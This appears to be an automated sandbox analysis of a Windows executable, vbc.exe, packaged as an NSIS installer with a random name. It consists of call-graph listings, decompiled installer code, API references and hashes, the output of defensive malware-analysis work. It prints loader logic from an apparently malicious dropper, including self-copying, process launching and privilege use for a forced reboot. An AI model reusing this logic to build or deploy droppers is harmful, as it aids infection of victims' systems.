405d76 2891->2894 2892->2891 2893 405d4c CharNextA 2893->2891 2893->2896 2894->2865 2896->2891 2896->2893 2897 405d3a CharNextA 2896->2897 2898 405d47 CharNextA 2896->2898 2907 4055a3 2896->2907 2897->2896 2898->2893 2900 4059dd 2899->2900 2901 40599f RegQueryValueExA 2899->2901 2900->2889 2902 4059c0 RegCloseKey 2901->2902 2902->2900 2904->2877 2905->2877 2906->2873 2908 4055a9 2907->2908 2909 4055bc 2908->2909 2910 4055af CharNextA 2908->2910 2909->2896 2910->2908 4156 4023a1 4157 402af2 19 API calls 4156->4157 4158 4023ab 4157->4158 4159 4029e8 18 API calls 4158->4159 4160 4023b4 4159->4160 4161 40264e 4160->4161 4162 4023be RegQueryValueExA 4160->4162 4163 4023de 4162->4163 4164 4023e4 RegCloseKey 4162->4164 4163->4164 4167 4059e3 wsprintfA 4163->4167 4164->4161 4167->4164 4168 401922 4169 4029e8 18 API calls 4168->4169 4170 401929 lstrlenA 4169->4170 4171 4024aa 4170->4171 3170 403225 #17 SetErrorMode OleInitialize 3240 405da3 GetModuleHandleA 3170->3240 3174 403293 GetCommandLineA 3245 405a85 lstrcpynA 3174->3245 3176 4032a5 GetModuleHandleA 3177 4032bc 3176->3177 3178 4055a3 CharNextA 3177->3178 3179 4032d0 CharNextA 3178->3179 3185 4032dd 3179->3185 3180 403346 3181 403359 GetTempPathA 3180->3181 3246 4031f1 3181->3246 3183 40336f 3186 403393 DeleteFileA 3183->3186 3187 403373 GetWindowsDirectoryA lstrcatA 3183->3187 3184 4055a3 CharNextA 3184->3185 3185->3180 3185->3184 3191 403348 3185->3191 3254 402c5b GetTickCount GetModuleFileNameA 3186->3254 3189 4031f1 11 API calls 3187->3189 3192 40338f 3189->3192 3190 4033a4 3193 403411 ExitProcess OleUninitialize 3190->3193 3199 4055a3 CharNextA 3190->3199 3228 4033fd 3190->3228 3338 405a85 lstrcpynA 3191->3338 3192->3186 3192->3193 3195 403426 3193->3195 3196 40350b 3193->3196 3200 405346 MessageBoxIndirectA 3195->3200 3197 40358e ExitProcess 3196->3197 3201 405da3 3 API calls 3196->3201 3204 4033bb 3199->3204 3205 403434 ExitProcess 3200->3205 3206 40351a 3201->3206 3209 4033d8 3204->3209 3210 40343c lstrcatA 
lstrcmpiA 3204->3210 3207 405da3 3 API calls 3206->3207 3208 403523 3207->3208 3211 405da3 3 API calls 3208->3211 3339 405659 3209->3339 3210->3193 3212 403458 CreateDirectoryA SetCurrentDirectoryA 3210->3212 3216 40352c 3211->3216 3214 40347a 3212->3214 3215 40346f 3212->3215 3356 405a85 lstrcpynA 3214->3356 3355 405a85 lstrcpynA 3215->3355 3217 40357a ExitWindowsEx 3216->3217 3224 40353a GetCurrentProcess 3216->3224 3217->3197 3221 403587 3217->3221 3223 40140b 2 API calls 3221->3223 3223->3197 3230 40354a 3224->3230 3225 4033f2 3354 405a85 lstrcpynA 3225->3354 3227 405aa7 18 API calls 3229 4034aa DeleteFileA 3227->3229 3284 4035e3 3228->3284 3231 4034b7 CopyFileA 3229->3231 3237 403488 3229->3237 3230->3217 3231->3237 3232 4034ff 3234 4057d3 38 API calls 3232->3234 3235 403506 3234->3235 3235->3193 3236 405aa7 18 API calls 3236->3237 3237->3227 3237->3232 3237->3236 3239 4034eb CloseHandle 3237->3239 3357 4057d3 3237->3357 3383 4052e5 CreateProcessA 3237->3383 3239->3237 3241 405dca GetProcAddress 3240->3241 3242 405dbf LoadLibraryA 3240->3242 3243 403268 SHGetFileInfoA 3241->3243 3242->3241 3242->3243 3244 405a85 lstrcpynA 3243->3244 3244->3174 3245->3176 3247 405ce3 5 API calls 3246->3247 3249 4031fd 3247->3249 3248 403207 3248->3183 3249->3248 3250 405578 3 API calls 3249->3250 3251 40320f CreateDirectoryA 3250->3251 3252 40578b 2 API calls 3251->3252 3253 403223 3252->3253 3253->3183 3386 40575c GetFileAttributesA CreateFileA 3254->3386 3256 402c9e 3283 402cab 3256->3283 3387 405a85 lstrcpynA 3256->3387 3258 402cc1 3388 4055bf lstrlenA 3258->3388 3262 402cd2 GetFileSize 3263 402dd3 3262->3263 3264 402ce9 3262->3264 3265 402bc5 32 API calls 3263->3265 3264->3263 3266 4031a8 ReadFile 3264->3266 3269 402e6e 3264->3269 3275 402bc5 32 API calls 3264->3275 3264->3283 3267 402dda 3265->3267 3266->3264 3268 402e16 GlobalAlloc 3267->3268 3267->3283 3393 4031da SetFilePointer 3267->3393 3271 402e2d 3268->3271 3272 402bc5 32 API calls 3269->3272 3276 40578b 2 API calls 
3271->3276 3272->3283 3273 402df7 3274 4031a8 ReadFile 3273->3274 3277 402e02 3274->3277 3275->3264 3278 402e3e CreateFileA 3276->3278 3277->3268 3277->3283 3279 402e78 3278->3279 3278->3283 3394 4031da SetFilePointer 3279->3394 3281 402e86 3282 402f01 47 API calls 3281->3282 3282->3283 3283->3190 3285 405da3 3 API calls 3284->3285 3286 4035f7 3285->3286 3287 4035fd 3286->3287 3288 40360f 3286->3288 3404 4059e3 wsprintfA 3287->3404 3289 40596c 3 API calls 3288->3289 3290 403630 3289->3290 3292 40364e lstrcatA 3290->3292 3294 40596c 3 API calls 3290->3294 3293 40360d 3292->3293 3395 403897 3293->3395 3294->3292 3297 405659 18 API calls 3298 403676 3297->3298 3299 4036ff 3298->3299 3301 40596c 3 API calls 3298->3301 3300 405659 18 API calls 3299->3300 3302 403705 3300->3302 3303 4036a2 3301->3303 3304 403715 LoadImageA 3302->3304 3305 405aa7 18 API calls 3302->3305 3303->3299 3309 4036be lstrlenA 3303->3309 3312 4055a3 CharNextA 3303->3312 3306 403740 RegisterClassA 3304->3306 3307 4037c9 3304->3307 3305->3304 3310 40377c SystemParametersInfoA CreateWindowExA 3306->3310 3337 40340d 3306->3337 3308 40140b 2 API calls 3307->3308 3311 4037cf 3308->3311 3313 4036f2 3309->3313 3314 4036cc lstrcmpiA 3309->3314 3310->3307 3319 403897 19 API calls 3311->3319 3311->3337 3317 4036bc 3312->3317 3316 405578 3 API calls 3313->3316 3314->3313 3315 4036dc GetFileAttributesA 3314->3315 3318 4036e8 3315->3318 3320 4036f8 3316->3320 3317->3309 3318->3313 3321 4055bf 2 API calls 3318->3321 3322 4037e0 3319->3322 3405 405a85 lstrcpynA 3320->3405 3321->3313 3324 403864 3322->3324 3325 4037e8 ShowWindow LoadLibraryA 3322->3325 3406 404ef5 OleInitialize 3324->3406 3326 403807 LoadLibraryA 3325->3326 3327 40380e GetClassInfoA 3325->3327 3326->3327 3330 403822 GetClassInfoA RegisterClassA 3327->3330 3331 403838 DialogBoxParamA 3327->3331 3329 40386a 3332 403886 3329->3332 3333 40386e 3329->3333 3330->3331 3334 40140b 2 API calls 3331->3334 3335 40140b 2 API calls 3332->3335 3336 40140b 2 API 
calls 3333->3336 3333->3337 3334->3337 3335->3337 3336->3337 3337->3193 3338->3181 3414 405a85 lstrcpynA 3339->3414 3341 40566a 3342 40560c 4 API calls 3341->3342 3343 405670 3342->3343 3344 4033e3 3343->3344 3345 405ce3 5 API calls 3343->3345 3344->3193 3353 405a85 lstrcpynA 3344->3353 3351 405680 3345->3351 3346 4056ab lstrlenA 3347 4056b6 3346->3347 3346->3351 3349 405578 3 API calls 3347->3349 3348 405d7c 2 API calls 3348->3351 3350 4056bb GetFileAttributesA 3349->3350 3350->3344 3351->3344 3351->3346 3351->3348 3352 4055bf 2 API calls 3351->3352 3352->3346 3353->3225 3354->3228 3355->3214 3356->3237 3358 405da3 3 API calls 3357->3358 3359 4057de 3358->3359 3360 40583b GetShortPathNameA 3359->3360 3362 405930 3359->3362 3415 40575c GetFileAttributesA CreateFileA 3359->3415 3361 405850 3360->3361 3360->3362 3361->3362 3364 405858 wsprintfA 3361->3364 3362->3237 3366 405aa7 18 API calls 3364->3366 3365 40581f CloseHandle GetShortPathNameA 3365->3362 3367 405833 3365->3367 3368 405880 3366->3368 3367->3360 3367->3362 3416 40575c GetFileAttributesA CreateFileA 3368->3416 3370 40588d 3370->3362 3371 40589c GetFileSize GlobalAlloc 3370->3371 3372 405929 CloseHandle 3371->3372 3373 4058ba ReadFile 3371->3373 3372->3362 3373->3372 3374 4058ce 3373->3374 3374->3372 3417 4056d1 lstrlenA 3374->3417 3377 4058e3 3422 405a85 lstrcpynA 3377->3422 3378 40593d 3379 4056d1 4 API calls 3378->3379 3381 4058f1 3379->3381 3382 405904 SetFilePointer WriteFile GlobalFree 3381->3382 3382->3372 3384 405320 3383->3384 3385 405314 CloseHandle 3383->3385 3384->3237 3385->3384 3386->3256 3387->3258 3389 4055cc 3388->3389 3390 4055d1 CharPrevA 3389->3390 3391 402cc7 3389->3391 3390->3389 3390->3391 3392 405a85 lstrcpynA 3391->3392 3392->3262 3393->3273 3394->3281 3396 4038ab 3395->3396 3413 4059e3 wsprintfA 3396->3413 3398 40391c 3399 405aa7 18 API calls 3398->3399 3400 403928 SetWindowTextA 3399->3400 3401 403944 3400->3401 3402 40365e 3400->3402 3401->3402 3403 405aa7 18 API calls 
3401->3403 3402->3297 3403->3401 3404->3293 3405->3299 3407 403e83 SendMessageA 3406->3407 3409 404f18 3407->3409 3408 403e83 SendMessageA 3410 404f51 OleUninitialize 3408->3410 3411 401389 2 API calls 3409->3411 3412 404f3f 3409->3412 3410->3329 3411->3409 3412->3408 3413->3398 3414->3341 3415->3365 3416->3370 3418 405707 lstrlenA 3417->3418 3419 405711 3418->3419 3420 4056e5 lstrcmpiA 3418->3420 3419->3377 3419->3378 3420->3419 3421 4056fe CharNextA 3420->3421 3421->3418 3422->3381 4172 401ca5 4173 4029cb 18 API calls 4172->4173 4174 401cb5 SetWindowLongA 4173->4174 4175 40287d 4174->4175 3423 4035a6 3424 4035c1 3423->3424 3425 4035b7 CloseHandle 3423->3425 3426 4035d5 3424->3426 3427 4035cb CloseHandle 3424->3427 3425->3424 3430 4053aa 3426->3430 3427->3426 3431 405659 18 API calls 3430->3431 3432 4053be 3431->3432 3433 4053c7 DeleteFileA 3432->3433 3434 4053de 3432->3434 3435 4035e1 3433->3435 3436 405513 3434->3436 3472 405a85 lstrcpynA 3434->3472 3436->3435 3443 405d7c 2 API calls 3436->3443 3438 405408 3439 405419 3438->3439 3440 40540c lstrcatA 3438->3440 3442 4055bf 2 API calls 3439->3442 3441 40541f 3440->3441 3444 40542d lstrcatA 3441->3444 3446 405438 lstrlenA FindFirstFileA 3441->3446 3442->3441 3445 405538 3443->3445 3444->3446 3445->3435 3447 405578 3 API calls 3445->3447 3446->3436 3452 40545c 3446->3452 3449 405542 3447->3449 3448 4055a3 CharNextA 3448->3452 3450 40573d 2 API calls 3449->3450 3451 405548 RemoveDirectoryA 3450->3451 3453 405553 3451->3453 3454 40556a 3451->3454 3452->3448 3458 4054f2 FindNextFileA 3452->3458 3461 4054b9 3452->3461 3465 4053aa 59 API calls 3452->3465 3473 405a85 lstrcpynA 3452->3473 3453->3435 3456 405559 3453->3456 3457 404e23 25 API calls 3454->3457 3459 404e23 25 API calls 3456->3459 3457->3435 3458->3452 3460 40550a FindClose 3458->3460 3462 405561 3459->3462 3460->3436 3464 40573d 2 API calls 3461->3464 3463 4057d3 38 API calls 3462->3463 3466 405568 3463->3466 3467 4054bf DeleteFileA 3464->3467 3465->3452 
3466->3435 3468 4054ca 3467->3468 3468->3458 3469 404e23 25 API calls 3468->3469 3470 404e23 25 API calls 3468->3470 3471 4057d3 38 API calls 3468->3471 3469->3458 3470->3468 3471->3468 3472->3438 3473->3452 4176 401a26 4177 4029cb 18 API calls 4176->4177 4178 401a2c 4177->4178 4179 4029cb 18 API calls 4178->4179 4180 4019d6 4179->4180 4181 4045aa 4182 4045d6 4181->4182 4183 4045ba 4181->4183 4184 404609 4182->4184 4185 4045dc SHGetPathFromIDListA 4182->4185 4192 40532a GetDlgItemTextA 4183->4192 4187 4045ec 4185->4187 4191 4045f3 SendMessageA 4185->4191 4189 40140b 2 API calls 4187->4189 4188 4045c7 SendMessageA 4188->4182 4189->4191 4191->4184 4192->4188 4193 402b2d 4194 402b55 4193->4194 4195 402b3c SetTimer 4193->4195 4196 402ba3 4194->4196 4197 402ba9 MulDiv 4194->4197 4195->4194 4198 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4197->4198 4198->4196 4200 401bad 4201 4029cb 18 API calls 4200->4201 4202 401bb4 4201->4202 4203 4029cb 18 API calls 4202->4203 4204 401bbe 4203->4204 4205 4029e8 18 API calls 4204->4205 4209 401bce 4204->4209 4205->4209 4206 4029e8 18 API calls 4210 401bde 4206->4210 4207 401be9 4211 4029cb 18 API calls 4207->4211 4208 401c2d 4212 4029e8 18 API calls 4208->4212 4209->4206 4209->4210 4210->4207 4210->4208 4213 401bee 4211->4213 4214 401c32 4212->4214 4215 4029cb 18 API calls 4213->4215 4216 4029e8 18 API calls 4214->4216 4218 401bf7 4215->4218 4217 401c3b FindWindowExA 4216->4217 4221 401c59 4217->4221 4219 401c1d SendMessageA 4218->4219 4220 401bff SendMessageTimeoutA 4218->4220 4219->4221 4220->4221 4222 40422e 4223 404264 4222->4223 4224 40423e 4222->4224 4226 403e9e 8 API calls 4223->4226 4225 403e37 19 API calls 4224->4225 4227 40424b SetDlgItemTextA 4225->4227 4228 404270 4226->4228 4227->4223 4229 402630 4230 4029e8 18 API calls 4229->4230 4231 402637 FindFirstFileA 4230->4231 4232 40265a 4231->4232 4233 40264a 4231->4233 4234 402661 4232->4234 4237 4059e3 wsprintfA 4232->4237 4238 405a85 lstrcpynA 4234->4238 4237->4234 
4238->4233 4246 4024b0 4247 4024b5 4246->4247 4248 4024c6 4246->4248 4249 4029cb 18 API calls 4247->4249 4250 4029e8 18 API calls 4248->4250 4252 4024bc 4249->4252 4251 4024cd lstrlenA 4250->4251 4251->4252 4253 4024ec WriteFile 4252->4253 4254 40264e 4252->4254 4253->4254 2911 4015b3 2912 4029e8 18 API calls 2911->2912 2913 4015ba 2912->2913 2929 40560c CharNextA CharNextA 2913->2929 2915 40160a 2916 40162d 2915->2916 2917 40160f 2915->2917 2923 401423 25 API calls 2916->2923 2935 401423 2917->2935 2918 4055a3 CharNextA 2920 4015d0 CreateDirectoryA 2918->2920 2922 4015e5 GetLastError 2920->2922 2926 4015c2 2920->2926 2925 4015f2 GetFileAttributesA 2922->2925 2922->2926 2927 40215b 2923->2927 2925->2926 2926->2915 2926->2918 2928 401621 SetCurrentDirectoryA 2928->2927 2930 405626 2929->2930 2934 405632 2929->2934 2931 40562d CharNextA 2930->2931 2930->2934 2932 40564f 2931->2932 2932->2926 2933 4055a3 CharNextA 2933->2934 2934->2932 2934->2933 2939 404e23 2935->2939 2938 405a85 lstrcpynA 2938->2928 2940 404e3e 2939->2940 2948 401431 2939->2948 2941 404e5b lstrlenA 2940->2941 2942 405aa7 18 API calls 2940->2942 2943 404e84 2941->2943 2944 404e69 lstrlenA 2941->2944 2942->2941 2945 404e97 2943->2945 2946 404e8a SetWindowTextA 2943->2946 2947 404e7b lstrcatA 2944->2947 2944->2948 2945->2948 2949 404e9d SendMessageA SendMessageA SendMessageA 2945->2949 2946->2945 2947->2943 2948->2938 2949->2948 3056 401734 3057 4029e8 18 API calls 3056->3057 3058 40173b 3057->3058 3059 401761 3058->3059 3060 401759 3058->3060 3111 405a85 lstrcpynA 3059->3111 3110 405a85 lstrcpynA 3060->3110 3063 40175f 3067 405ce3 5 API calls 3063->3067 3064 40176c 3112 405578 lstrlenA CharPrevA 3064->3112 3087 40177e 3067->3087 3071 401795 CompareFileTime 3071->3087 3072 401859 3074 404e23 25 API calls 3072->3074 3073 401830 3075 404e23 25 API calls 3073->3075 3083 401845 3073->3083 3077 401863 3074->3077 3075->3083 3076 405a85 lstrcpynA 3076->3087 3095 402f01 3077->3095 3080 40188a SetFileTime 3081 

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 (first block 403225-4032ba; node and edge listing not reproduced)
                          C-Code - Quality: 81%
                          			_entry_() {
                          				struct _SHFILEINFOA _v360;
                          				struct _SECURITY_ATTRIBUTES* _v376;
                          				char _v380;
                          				CHAR* _v384;
                          				char _v392;
                          				int _v396;
                          				int _v400;
                          				signed int _v404;
                          				CHAR* _v408;
                          				int _v412;
                          				struct _SECURITY_ATTRIBUTES* _v416;
                          				struct _SECURITY_ATTRIBUTES* _v424;
                          				void* _v432;
                          				int _t34;
                          				CHAR* _t39;
                          				char* _t42;
                          				signed int _t44;
                          				void* _t48;
                          				int _t50;
                          				signed int _t51;
                          				signed int _t54;
                          				int _t55;
                          				signed int _t59;
                          				intOrPtr _t70;
                          				intOrPtr _t76;
                          				void* _t78;
                          				void* _t88;
                          				void* _t90;
                          				char* _t95;
                          				signed int _t96;
                          				void* _t97;
                          				signed int _t98;
                          				signed int _t99;
                          				signed int _t102;
                          				CHAR* _t104;
                          				signed int _t105;
                          				intOrPtr _t112;
                          				char _t119;
                          
                          				_v376 = 0;
                          				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                          				_t98 = 0;
                          				_v380 = 0x20;
                          				__imp__#17();
                          				_t34 = SetErrorMode(0x8001); // executed
                          				__imp__OleInitialize(0); // executed
                          				 *0x423f58 = _t34;
                          				 *0x423ea4 = E00405DA3(8);
                          				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                          				E00405A85("fwwmjbqpxzax Setup", "NSIS Error");
                          				_t39 = GetCommandLineA();
                          				_t95 = "\"C:\\Users\\Public\\vbc.exe\" ";
                          				E00405A85(_t95, _t39);
                          				 *0x423ea0 = GetModuleHandleA(0);
                          				_t42 = _t95;
                          				if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
                          					_v404 = 0x22;
                          					_t42 =  &M00429001;
                          				}
                          				_t44 = CharNextA(E004055A3(_t42, _v404));
                          				_v404 = _t44;
                          				while(1) {
                          					_t90 =  *_t44;
                          					_t108 = _t90;
                          					if(_t90 == 0) {
                          						break;
                          					}
                          					__eflags = _t90 - 0x20;
                          					if(_t90 != 0x20) {
                          						L5:
                          						__eflags =  *_t44 - 0x22;
                          						_v404 = 0x20;
                          						if( *_t44 == 0x22) {
                          							_t44 = _t44 + 1;
                          							__eflags = _t44;
                          							_v404 = 0x22;
                          						}
                          						__eflags =  *_t44 - 0x2f;
                          						if( *_t44 != 0x2f) {
                          							L15:
                          							_t44 = E004055A3(_t44, _v404);
                          							__eflags =  *_t44 - 0x22;
                          							if(__eflags == 0) {
                          								_t44 = _t44 + 1;
                          								__eflags = _t44;
                          							}
                          							continue;
                          						} else {
                          							_t44 = _t44 + 1;
                          							__eflags =  *_t44 - 0x53;
                          							if( *_t44 == 0x53) {
                          								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                          								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                          									_t98 = _t98 | 0x00000002;
                          									__eflags = _t98;
                          								}
                          							}
                          							__eflags =  *_t44 - 0x4352434e;
                          							if( *_t44 == 0x4352434e) {
                          								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                          								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                          									_t98 = _t98 | 0x00000004;
                          									__eflags = _t98;
                          								}
                          							}
                          							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                          							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                          								 *((intOrPtr*)(_t44 - 2)) = 0;
                          								_t45 = _t44 + 2;
                          								__eflags = _t44 + 2;
                          								E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t45);
                          								L20:
                          								_t104 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                          								GetTempPathA(0x400, _t104);
                          								_t48 = E004031F1(_t108);
                          								_t109 = _t48;
                          								if(_t48 != 0) {
                          									L22:
                          									DeleteFileA("1033"); // executed
                          									_t50 = E00402C5B(_t110, _t98); // executed
                          									_v412 = _t50;
                          									if(_t50 != 0) {
                          										L32:
                          										ExitProcess(); // executed
                          										__imp__OleUninitialize(); // executed
                          										if(_v404 == 0) {
                          											__eflags =  *0x423f34; // 0x0
                          											if(__eflags != 0) {
                          												_t105 = E00405DA3(3);
                          												_t99 = E00405DA3(4);
                          												_t54 = E00405DA3(5);
                          												__eflags = _t105;
                          												_t96 = _t54;
                          												if(_t105 != 0) {
                          													__eflags = _t99;
                          													if(_t99 != 0) {
                          														__eflags = _t96;
                          														if(_t96 != 0) {
                          															_t59 =  *_t105(GetCurrentProcess(), 0x28,  &_v392);
                          															__eflags = _t59;
                          															if(_t59 != 0) {
                          																 *_t99(0, "SeShutdownPrivilege",  &_v396);
                          																_v412 = 1;
                          																_v400 = 2;
                          																 *_t96(_v416, 0,  &_v412, 0, 0, 0);
                          															}
                          														}
                          													}
                          												}
                          												_t55 = ExitWindowsEx(2, 0);
                          												__eflags = _t55;
                          												if(_t55 == 0) {
                          													E0040140B(9);
                          												}
                          											}
                          											_t51 =  *0x423f4c; // 0xffffffff
                          											__eflags = _t51 - 0xffffffff;
                          											if(_t51 != 0xffffffff) {
                          												_v396 = _t51;
                          											}
                          											ExitProcess(_v396);
                          										}
                          										E00405346(_v404, 0x200010);
                          										ExitProcess(2);
                          									}
                          									_t112 =  *0x423ebc; // 0x0
                          									if(_t112 == 0) {
                          										L31:
                          										 *0x423f4c =  *0x423f4c | 0xffffffff;
                          										_v400 = E004035E3();
                          										goto L32;
                          									}
                          									_t102 = E004055A3(_t95, 0);
                          									while(_t102 >= _t95) {
                          										__eflags =  *_t102 - 0x3d3f5f20;
                          										if(__eflags == 0) {
                          											break;
                          										}
                          										_t102 = _t102 - 1;
                          										__eflags = _t102;
                          									}
                          									_t114 = _t102 - _t95;
                          									_v408 = "Error launching installer";
                          									if(_t102 < _t95) {
                          										lstrcatA(_t104, "~nsu.tmp");
                          										_t100 = "C:\\Users\\Public";
                          										if(lstrcmpiA(_t104, "C:\\Users\\Public") == 0) {
                          											goto L32;
                          										}
                          										CreateDirectoryA(_t104, 0);
                          										SetCurrentDirectoryA(_t104);
                          										_t119 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
                          										if(_t119 == 0) {
                          											E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t100);
                          										}
                          										E00405A85(0x424000, _v396);
                          										 *0x424400 = 0x41;
                          										_t97 = 0x1a;
                          										do {
                          											_t70 =  *0x423eb0; // 0x8c0fa0
                          											E00405AA7(0, _t97, 0x41f050, 0x41f050,  *((intOrPtr*)(_t70 + 0x120)));
                          											DeleteFileA(0x41f050);
                          											if(_v416 != 0 && CopyFileA("C:\\Users\\Public\\vbc.exe", 0x41f050, 1) != 0) {
                          												_push(0);
                          												_push(0x41f050);
                          												E004057D3();
                          												_t76 =  *0x423eb0; // 0x8c0fa0
                          												E00405AA7(0, _t97, 0x41f050, 0x41f050,  *((intOrPtr*)(_t76 + 0x124)));
                          												_t78 = E004052E5(0x41f050);
                          												if(_t78 != 0) {
                          													CloseHandle(_t78);
                          													_v416 = 0;
                          												}
                          											}
                          											 *0x424400 =  *0x424400 + 1;
                          											_t97 = _t97 - 1;
                          										} while (_t97 != 0);
                          										_push(0);
                          										_push(_t104);
                          										E004057D3();
                          										goto L32;
                          									}
                          									 *_t102 = 0;
                          									_t103 = _t102 + 4;
                          									if(E00405659(_t114, _t102 + 4) == 0) {
                          										goto L32;
                          									}
                          									E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t103);
                          									E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t103);
                          									_v424 = 0;
                          									goto L31;
                          								}
                          								GetWindowsDirectoryA(_t104, 0x3fb);
                          								lstrcatA(_t104, "\\Temp");
                          								_t88 = E004031F1(_t109);
                          								_t110 = _t88;
                          								if(_t88 == 0) {
                          									goto L32;
                          								}
                          								goto L22;
                          							}
                          							goto L15;
                          						}
                          					} else {
                          						goto L4;
                          					}
                          					do {
                          						L4:
                          						_t44 = _t44 + 1;
                          						__eflags =  *_t44 - 0x20;
                          					} while ( *_t44 == 0x20);
                          					goto L5;
                          				}
                          				goto L20;
                          			}

                          APIs
                          • #17.COMCTL32 ref: 00403244
                          • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                          • OleInitialize.OLE32(00000000), ref: 00403256
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNEL32(?), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403268,00000008), ref: 00405DD1
                          • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,fwwmjbqpxzax Setup,NSIS Error), ref: 00405A92
                          • GetCommandLineA.KERNEL32(fwwmjbqpxzax Setup,NSIS Error), ref: 00403293
                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 004032A6
                          • CharNextA.USER32(00000000), ref: 004032D1
                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403364
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                          • DeleteFileA.KERNELBASE(1033), ref: 00403398
                          • ExitProcess.KERNELBASE(00000000), ref: 00403411
                          • OleUninitialize.OLE32 ref: 00403416
                          • ExitProcess.KERNEL32 ref: 00403436
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 00403442
                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 0040344E
                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                          • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                          • CopyFileA.KERNEL32 ref: 004034BF
                          • CloseHandle.KERNEL32(00000000), ref: 004034EC
                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                          • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                          • ExitProcess.KERNEL32 ref: 004035A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                          • String ID: /D=$ _?=$"$"C:\Users\Public\vbc.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$fwwmjbqpxzax Setup$~nsu.tmp
                          • API String ID: 553446912-226143577
                          • Opcode ID: d6bb6c7e58a1b69234bdd49ec568d23efec17356feddecacbd66420c64787950
                          • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                          • Opcode Fuzzy Hash: d6bb6c7e58a1b69234bdd49ec568d23efec17356feddecacbd66420c64787950
                          • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 349 (first block 4053aa-4053c5; node and edge listing not reproduced)
                          C-Code - Quality: 94%
                          			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                          				signed int _v8;
                          				signed int _v12;
                          				struct _WIN32_FIND_DATAA _v332;
                          				signed int _t37;
                          				char* _t49;
                          				signed int _t52;
                          				signed int _t55;
                          				signed int _t61;
                          				signed int _t63;
                          				void* _t65;
                          				signed int _t68;
                          				CHAR* _t70;
                          				CHAR* _t72;
                          				char* _t75;
                          
                          				_t72 = _a4;
                          				_t37 = E00405659(__eflags, _t72);
                          				_v12 = _t37;
                          				if((_a8 & 0x00000008) != 0) {
                          					_t63 = DeleteFileA(_t72); // executed
                          					asm("sbb eax, eax");
                          					_t65 =  ~_t63 + 1;
                          					 *0x423f28 =  *0x423f28 + _t65;
                          					return _t65;
                          				}
                          				_t68 = _a8 & 0x00000001;
                          				__eflags = _t68;
                          				_v8 = _t68;
                          				if(_t68 == 0) {
                          					L5:
